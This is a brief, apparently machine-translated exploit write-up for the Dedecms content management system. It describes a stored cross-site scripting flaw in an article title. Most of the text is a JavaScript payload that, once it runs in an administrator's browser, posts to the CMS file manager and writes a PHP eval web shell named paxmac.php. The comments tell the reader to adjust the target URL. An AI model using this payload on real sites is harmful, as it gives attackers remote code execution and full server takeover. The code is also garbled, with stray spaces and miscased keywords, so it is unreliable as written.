Dedecms has many vulnerabilities, but the vendor does not fix them.
In the previous double injection vulnerability, the title was able to be xss, but the official website only fixed the injection vulnerability. The xss did not fix the vulnerability, but added addslashes to the title.
Xss triggering in the background
Use js Code
Var request = false; if (window. XMLHttpRequest) {request = new XMLHttpRequest (); if (request. overrideMimeType) {request. overrideMimeType ('text/xml');} else if (window. activeXObject) {var versions = ['Microsoft. XMLHTTP ', 'msxml. XMLHTTP ', 'Microsoft. XMLHTTP ', 'msxml2. XMLHTTP.7.0 ', 'msxml2. XMLHTTP.6.0 ', 'msxml2. XMLHTTP.5.0 ', 'msxml2. XMLHTTP.4.0 ', 'msxml2. XMLHTTP.3.0 ', 'msxml2. XMLHTTP ']; for (var I = 0; I <versions. length; I ++) {try {request = new ActiveXObject (versions [I]);} catch (e) {}} xmlhttp = request; getshell (); function getshell () {var postStr = "fmdo = edit & backurl = & activepath = % 2 Fdedecmsfullnew % 2 Fuploads % 2 Fuploads & filename = paxmac. php & str = % 3C % 3 Fphp + eval % 28% 24_POST % 5B % 27cmd % 27% 5D % 29% 3B % 3F % 3E & B1 = ++ % B1 % A3 + % B4 % E6 ++ "; // modify the xmlhttp url by yourself. open ("POST "," http://paxmac/dedecmsfullnew/uploads/dede/file_manage_control.php ", True); // you need to modify xmlhttp by yourself. setRequestHeader ("Content-type", "application/x-www-form-urlencoded"); xmlhttp. setRequestHeader ("Content-length", postStr. length); xmlhttp. setRequestHeader ("Connection", "close"); xmlhttp. send (postStr );}
Before triggering
After triggering